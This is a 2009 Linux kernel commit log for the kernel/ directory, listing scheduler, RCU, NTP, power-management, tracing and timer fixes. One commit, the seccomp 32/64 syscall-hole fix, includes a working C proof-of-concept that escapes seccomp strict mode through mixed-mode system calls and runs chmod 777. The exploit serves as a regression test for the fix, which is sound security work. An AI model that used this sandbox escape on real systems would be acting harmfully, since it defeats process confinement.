summaryrefslogtreecommitdiff
path: root/kernel
AgeCommit message (Collapse)Author
2009-03-04rcu: increment quiescent state counter in ksoftirqd()Eric Dumazet
If a machine is flooded by network frames, a cpu can loop 100% of its time inside ksoftirqd() without calling schedule(). This can delay RCU grace period to insane values. Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem. Paul: "This regression was a result of the recent change from "schedule()" to "cond_resched()", which got rid of that quiescent state in the common case where a reschedule is not needed". Signed-off-by: Eric Dumazet <dada1@cosmosbay.com> Reviewed-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-03Merge branch 'sched-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: sched: don't allow setuid to succeed if the user does not have rt bandwidth sched_rt: don't start timer when rt bandwidth disabled
2009-03-03Merge branch 'core-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: rcu: Teach RCU that idle task is not quiscent state at boot
2009-03-02x86-64: seccomp: fix 32/64 syscall holeRoland McGrath
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-03genirq: assert that irq handlers are indeed running in hardirq contextPeter Zijlstra
Make sure the genirq layer handlers are indeed running handlers in hardirq context. That is the genirq expectation and doing anything else is broken. Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Cc: Andrew Morton <akpm@linux-foundation.org> LKML-Reference: <1236006812.5330.632.camel@laptop> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02Merge branch 'linus' into irq/genirqIngo Molnar
2009-03-02sched: kill unused parameter of pick_next_task()Wang Chen
Impact: micro-optimization Parameter "prev" is not used really. Signed-off-by: Wang Chen <wangchen@cn.fujitsu.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02Merge branches 'sched/clock', 'sched/urgent' and 'linus' into sched/coreIngo Molnar
2009-03-01Merge branch 'master' of ↵David S. Miller
master.kernel.org:/pub/scm/linux/kernel/git/davem/net-2.6 Conflicts: drivers/net/wireless/iwlwifi/iwl-tx.c net/8021q/vlan_core.c net/core/dev.c
2009-02-27Fix recursive lock in free_uid()/free_user_ns()David Howells
free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction. Fix this by deferring the destruction of the user_namespace. Signed-off-by: David Howells <dhowells@redhat.com> Acked-by: Serge Hallyn <serue@us.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-27sched: don't allow setuid to succeed if the user does not have rt bandwidthDhaval Giani
Impact: fix hung task with certain (non-default) rt-limit settings Corey Hickey reported that on using setuid to change the uid of a rt process, the process would be unkillable and not be running. This is because there was no rt runtime for that user group. Add in a check to see if a user can attach an rt task to its task group. On failure, return EINVAL, which is also returned in CONFIG_CGROUP_SCHED. Reported-by: Corey Hickey <bugfood-ml@fatooh.org> Signed-off-by: Dhaval Giani <dhaval@linux.vnet.ibm.com> Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-27keys: distinguish per-uid keys in different namespacesSerge E. Hallyn
per-uid keys were looked by uid only. Use the user namespace to distinguish the same uid in different namespaces. This does not address key_permission. So a task can for instance try to join a keyring owned by the same uid in another namespace. That will be handled by a separate patch. Signed-off-by: Serge E. Hallyn <serue@us.ibm.com> Acked-by: David Howells <dhowells@redhat.com> Signed-off-by: James Morris <jmorris@namei.org>
2009-02-26sched_clock: cleanupsPeter Zijlstra
- remove superfluous checks in __update_sched_clock() - skip sched_clock_tick() for sched_clock_stable - reinstate the simple !HAVE_UNSTABLE_SCHED_CLOCK code to please the bloatwatch Signed-off-by: Peter Zijlstra <peterz@infradead.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26sched: allow architectures to specify sched_clock_stableIngo Molnar
Allow CONFIG_HAVE_UNSTABLE_SCHED_CLOCK architectures to still specify that their sched_clock() implementation is reliable. This will be used by x86 to switch on a faster sched_clock_cpu() implementation on certain CPU types. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26time: ntp: fix bug in ntp_update_offset() & do_adjtimex(), fixJohn Stultz
The time_status conditional was accidentally placed right after we clear the checked time_status bits, which causes us to take the conditional every time through. This fixes it by moving the conditional to before we clear the time_status bits. Signed-off-by: John Stultz <johnstul@us.ibm.com> Cc: Clark Williams <williams@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26sched_rt: don't start timer when rt bandwidth disabledHiroshi Shimamoto
Impact: fix incorrect condition check No need to start rt bandwidth timer when rt bandwidth is disabled. If this timer starts, it may stop at sched_rt_period_timer() on the first time. Signed-off-by: Hiroshi Shimamoto <h-shimamoto@ct.jp.nec.com> Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26cpuacct: add a branch predictionLi Zefan
cpuacct_charge() is in fast-path, and checking of !cpuacct_susys.active always returns false after cpuacct has been initialized at system boot. Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Cc: Peter Zijlstra <a.p.zijlstra@chello.nl> Cc: Paul Menage <menage@google.com> Cc: Balbir Singh <balbir@linux.vnet.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26Merge branches 'sched/cleanups', 'sched/urgent' and 'linus' into sched/coreIngo Molnar
2009-02-26rcu: Teach RCU that idle task is not quiscent state at bootPaul E. McKenney
This patch fixes a bug located by Vegard Nossum with the aid of kmemcheck, updated based on review comments from Nick Piggin, Ingo Molnar, and Andrew Morton. And cleans up the variable-name and function-name language. ;-) The boot CPU runs in the context of its idle thread during boot-up. During this time, idle_cpu(0) will always return nonzero, which will fool Classic and Hierarchical RCU into deciding that a large chunk of the boot-up sequence is a big long quiescent state. This in turn causes RCU to prematurely end grace periods during this time. This patch changes the rcutree.c and rcuclassic.c rcu_check_callbacks() function to ignore the idle task as a quiescent state until the system has started up the scheduler in rest_init(), introducing a new non-API function rcu_idle_now_means_idle() to inform RCU of this transition. RCU maintains an internal rcu_idle_cpu_truthful variable to track this state, which is then used by rcu_check_callback() to determine if it should believe idle_cpu(). Because this patch has the effect of disallowing RCU grace periods during long stretches of the boot-up sequence, this patch also introduces Josh Triplett's UP-only optimization that makes synchronize_rcu() be a no-op if num_online_cpus() returns 1. This allows boot-time code that calls synchronize_rcu() to proceed normally. Note, however, that RCU callbacks registered by call_rcu() will likely queue up until later in the boot sequence. Although rcuclassic and rcutree can also use this same optimization after boot completes, rcupreempt must restrict its use of this optimization to the portion of the boot sequence before the scheduler starts up, given that an rcupreempt RCU read-side critical section may be preeempted. In addition, this patch takes Nick Piggin's suggestion to make the system_state global variable be __read_mostly. Changes since v4: o Changes the name of the introduced function and variable to be less emotional. ;-) Changes since v3: o WARN_ON(nr_context_switches() > 0) to verify that RCU switches out of boot-time mode before the first context switch, as suggested by Nick Piggin. Changes since v2: o Created rcu_blocking_is_gp() internal-to-RCU API that determines whether a call to synchronize_rcu() is itself a grace period. o The definition of rcu_blocking_is_gp() for rcuclassic and rcutree checks to see if but a single CPU is online. o The definition of rcu_blocking_is_gp() for rcupreempt checks to see both if but a single CPU is online and if the system is still in early boot. This allows rcupreempt to again work correctly if running on a single CPU after booting is complete. o Added check to rcupreempt's synchronize_sched() for there being but one online CPU. Tested all three variants both SMP and !SMP, booted fine, passed a short rcutorture test on both x86 and Power. Located-by: Vegard Nossum <vegard.nossum@gmail.com> Tested-by: Vegard Nossum <vegard.nossum@gmail.com> Tested-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up second_overflow()Ingo Molnar
Impact: cleanup, no functionality changed The 'time_adj' local variable is named in a very confusing way because it almost shadows the 'time_adjust' global variable - which is used in this same function. Rename it to 'delta' - to make them stand apart more clearly. kernel/time/ntp.o: text data bss dec hex filename 2545 114 144 2803 af3 ntp.o.before 2545 114 144 2803 af3 ntp.o.after md5: 1bf0b3be564512279ba7cee299d1d2be ntp.o.before.asm 1bf0b3be564512279ba7cee299d1d2be ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify ntp_tick_adj calculationsIngo Molnar
Impact: micro-optimization Convert the (internal) ntp_tick_adj value we store from unscaled units to scaled units. This is a constant that we never modify, so scaling it up once during bootup is enough - we dont have to do it for every adjustment step. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: make 64-bit constants more robustIngo Molnar
Impact: cleanup, no functionality changed - make PPM_SCALE an explicit s64 constant, to remove (s64) casts from usage sites. kernel/time/ntp.o: text data bss dec hex filename 2536 114 136 2786 ae2 ntp.o.before 2536 114 136 2786 ae2 ntp.o.after md5: 40a7728d1188aa18e83e21a81fa7b150 ntp.o.before.asm 40a7728d1188aa18e83e21a81fa7b150 ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor do_adjtimex() some moreIngo Molnar
Impact: cleanup, no functionality changed Further simplify do_adjtimex(): - introduce the ntp_start_leap_timer() helper function - eliminate the goto adj_done complication Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor do_adjtimex()Ingo Molnar
Impact: cleanup, no functionality changed do_adjtimex() is currently a monster function with a maze of branches. Refactor the txc->modes setting aspects of it into two new helper functions: process_adj_status() process_adjtimex_modes() kernel/time/ntp.o: text data bss dec hex filename 2512 114 136 2762 aca ntp.o.before 2512 114 136 2762 aca ntp.o.after Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: fix bug in ntp_update_offset() & do_adjtimex()Ingo Molnar
Impact: change (fix) the way the NTP PLL seconds offset is initialized/tracked Fix a bug and do a micro-optimization: When PLL is enabled we do not reset time_reftime. If the PLL was off for a long time (for example after bootup), this is arguably the wrong thing to do. We already had a hack for the common boot-time case in ntp_update_offset(), in form of: if (unlikely(time_status & STA_FREQHOLD || time_reftime == 0)) secs = 0; But the update delta should be reset later on too - not just when the PLL is enabled for the first time after bootup. So do it on !STA_PLL -> STA_PLL transitions. This changes behavior, as previously if ntpd was disabled for a long time and we restarted it, we'd run from that last update, with a very large delta. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: micro-optimize ntp_update_offset()Ingo Molnar
Impact: cleanup, no functionality changed The time_reftime update in ntp_update_offset() to xtime.tv_sec is a convoluted way of saying that we want to freeze the frequency and want the 'secs' delta to be 0. Also make this branch unlikely. This shaves off 8 bytes from the code size: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2496 114 136 2746 aba ntp.o.after Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify ntp_update_offset_fll()Ingo Molnar
Impact: cleanup, no functionality changed Change ntp_update_offset_fll() to delta logic instead of absolute value logic. This eliminates 'freq_adj' from the function. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor and clean up ntp_update_offset()Ingo Molnar
Impact: cleanup, no functionality changed - introduce the ntp_update_offset_fll() helper - clean up the flow and variable naming kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 01f7b8e1a5472a3056f9e4ae84d46315 ntp.o.before.asm 01f7b8e1a5472a3056f9e4ae84d46315 ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor up ntp_update_frequency()Ingo Molnar
Impact: cleanup, no functionality changed Change ntp_update_frequency() from a hard to follow code flow that uses global variables as temporaries, to a clean input+output flow. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up ntp_update_frequency()Ingo Molnar
Impact: cleanup, no functionality changed Prepare a refactoring of ntp_update_frequency(). kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 41f3009debc9b397d7394dd77d912f0a ntp.o.before.asm 41f3009debc9b397d7394dd77d912f0a ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify the MAX_TICKADJ_SCALED definitionIngo Molnar
Impact: cleanup, no functionality changed There's an ugly u64 typecase in the MAX_TICKADJ_SCALED definition, this can be eliminated by making the MAX_TICKADJ constant's type 64-bit (signed). kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 41f3009debc9b397d7394dd77d912f0a ntp.o.before.asm 41f3009debc9b397d7394dd77d912f0a ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify the second_overflow() code flowIngo Molnar
Impact: cleanup, no functionality changed Instead of a hierarchy of conditions, transform them to clean gradual conditions and return's. This makes the flow easier to read and makes the purpose of the function easier to understand. kernel/time/ntp.o: text data bss dec hex filename 2552 170 168 2890 b4a ntp.o.before 2552 170 168 2890 b4a ntp.o.after md5: eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.before.asm eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up kernel/time/ntp.cIngo Molnar
Impact: cleanup, no functionality changed Make this file a bit more readable by applying a consistent coding style. No code changed: kernel/time/ntp.o: text data bss dec hex filename 2552 170 168 2890 b4a ntp.o.before 2552 170 168 2890 b4a ntp.o.after md5: eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.before.asm eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-24Merge branch 'master' of /home/davem/src/GIT/linux-2.6/David S. Miller
2009-02-22PM: Split up sysdev_[suspend|resume] from device_power_[down|up]Rafael J. Wysocki
Move the sysdev_suspend/resume from the callee to the callers, with no real change in semantics, so that we can rework the disabling of interrupts during suspend/hibernation. This is based on an earlier patch from Linus. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21Merge branch 'hibernate'Linus Torvalds
* hibernate: PM: Fix suspend_console and resume_console to use only one semaphore PM: Wait for console in resume PM: Fix pm_notifiers during user mode hibernation swsusp: clean up shrink_all_zones() swsusp: dont fiddle with swappiness PM: fix build for CONFIG_PM unset PM/hibernate: fix "swap breaks after hibernation failures" PM/resume: wait for device probing to finish Consolidate driver_probe_done() loops into one place
2009-02-21PM: Fix suspend_console and resume_console to use only one semaphoreArve Hjønnevåg
This fixes a race where a thread acquires the console while the console is suspended, and the console is resumed before this thread releases it. In this case, the secondary console semaphore would be left locked, and the primary semaphore would be released twice. This in turn would cause the console switch on suspend or resume to hang forever. Note that suspend_console does not actually lock the console for clients that use acquire_console_sem, it only locks it for clients that use try_acquire_console_sem. If we change suspend_console to fully lock the console, then the kernel may deadlock on suspend. One client of try_acquire_console_sem is acquire_console_semaphore_for_printk, which uses it to prevent printk from using the console while it is suspended. Signed-off-by: Arve Hjønnevåg <arve@android.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: Wait for console in resumeArve Hjønnevåg
Avoids later waking up to a blinking cursor if the device woke up and returned to sleep before the console switch happened. Signed-off-by: Brian Swetland <swetland@google.com> Signed-off-by: Arve Hjønnevåg <arve@android.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: Fix pm_notifiers during user mode hibernationAndrey Borzenkov
Snapshot device is opened with O_RDONLY during suspend and O_WRONLY durig resume. Make sure we also call notifiers with correct parameter telling them what we are really doing. Signed-off-by: Andrey Borzenkov <arvidjaar@mail.ru> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Acked-by: Pavel Machek <pavel@ucw.cz> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: fix build for CONFIG_PM unsetRafael J. Wysocki
Compilation of kprobes.c with CONFIG_PM unset is broken due to some broken config dependncies. Fix that. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Reported-by: Ingo Molnar <mingo@elte.hu> Tested-by: Masami Hiramatsu <mhiramat@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM/resume: wait for device probing to finishArjan van de Ven
the resume code does not currently wait for device probing to finish. Even without async function calls this is dicey and not correct, but with async function calls during the boot sequence this is going to get hit more... This patch adds the synchronization using the newly introduced helper. Signed-off-by: Arjan van de Ven <arjan@linux.intel.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Acked-by: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-19Merge branch 'tracing-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'tracing-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: tracing: limit the number of loops the ring buffer self test can make tracing: have function trace select kallsyms tracing: disable tracing while testing ring buffer tracing/function-graph-tracer: trace the idle tasks
2009-02-19time: apply NTP frequency/tick changes immediatelyjohn stultz
Since the GENERIC_TIME changes landed, the adjtimex behavior changed for struct timex.tick and .freq changed. When the tick or freq value is set, we adjust the tick_length_base in ntp_update_frequency(). However, this new value doesn't get applied to tick_length until the next second (via second_overflow). This means some applications that do quick time tweaking do not see the requested change made as quickly as expected. I've run a few tests with this change, and ntpd still functions fine. Signed-off-by: John Stultz <johnstul@us.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-18tracing: limit the number of loops the ring buffer self test can makeSteven Rostedt
Impact: prevent deadlock if ring buffer gets corrupted This patch adds a paranoid check to make sure the ring buffer consumer does not go into an infinite loop. Since the ring buffer has been set to read only, the consumer should not loop for more than the ring buffer size. A check is added to make sure the consumer does not loop more than the ring buffer size. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18tracing: have function trace select kallsymsSteven Rostedt
Impact: fix output of function tracer to be useful The function tracer is pretty useless if KALLSYMS is not configured. Unless you are good at reading hex values, the function tracer should select the KALLSYMS configuration. Also, the dynamic function tracer will fail its self test if KALLSYMS is not selected. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18tracing: disable tracing while testing ring bufferSteven Rostedt
Impact: fix to prevent hard lockup on self tests If one of the tracers are broken and is constantly filling the ring buffer while the test of the ring buffer is running, it will hang the box. The reason is that the test is a consumer that will not stop till the ring buffer is empty. But if the tracer is broken and is constantly producing input to the buffer, this test will never end. The result is a lockup of the box. This happened when KALLSYMS was not defined and the dynamic ftrace test constantly filled the ring buffer, because the filter failed and all functions were being traced. Something was being called that constantly filled the buffer. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18Merge branch 'for-linus' of git://git.kernel.dk/linux-2.6-blockLinus Torvalds
* 'for-linus' of git://git.kernel.dk/linux-2.6-block: block: fix deadlock in blk_abort_queue() for drivers that readd to timeout list block: fix booting from partitioned md array block: revert part of 18ce3751ccd488c78d3827e9f6bf54e6322676fb cciss: PCI power management reset for kexec paride/pg.c: xs(): &&/|| confusion fs/bio: bio_alloc_bioset: pass right object ptr to mempool_free block: fix bad definition of BIO_RW_SYNC bsg: Fix sense buffer bug in SG_IO
2009-02-18pm: fix build for CONFIG_PM unsetRafael J. Wysocki
Compilation of kprobes.c with CONFIG_PM unset is broken due to some broken config dependncies. Fix that. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Reported-by: Ingo Molnar <mingo@elte.hu> Tested-by: Masami Hiramatsu <mhiramat@redhat.com> Cc: Len Brown <lenb@kernel.org> Acked-by: Pavel Machek <pavel@suse.cz> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-18cgroups: fix possible use after freeLi Zefan
In cgroup_kill_sb(), root is freed before sb is detached from the list, so another sget() may find this sb and call cgroup_test_super(), which will access the root that has been freed. Reported-by: Al Viro <viro@ZenIV.linux.org.uk> Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Acked-by: Paul Menage <menage@google.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-18timers: add mod_timer_pending()Ingo Molnar
Impact: new timer API Based on an idea from Martin Josefsson with the help of Patrick McHardy and Stephen Hemminger: introduce the mod_timer_pending() API which is a mod_timer() offspring that is an invariant on already removed timers. (regular mod_timer() re-activates non-pending timers.) This is useful for the networking code in that it can allow unserialized mod_timer_pending() timer-forwarding calls, but a single del_timer*() will stop the timer from being reactivated again. Also while at it: - optimize the regular mod_timer() path some more, the timer-stat and a debug check was needlessly duplicated in __mod_timer(). - make the exports come straight after the function, as most other exports in timer.c already did. - eliminate __mod_timer() as an external API, change the users to mod_timer(). The regular mod_timer() code path is not impacted significantly, due to inlining optimizations and due to the simplifications. Based-on-patch-from: Stephen Hemminger <shemminger@vyatta.com> Acked-by: Stephen Hemminger <shemminger@vyatta.com> Cc: "David S. Miller" <davem@davemloft.net> Cc: Patrick McHardy <kaber@trash.net> Cc: netdev@vger.kernel.org Cc: Oleg Nesterov <oleg@redhat.com> Cc: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>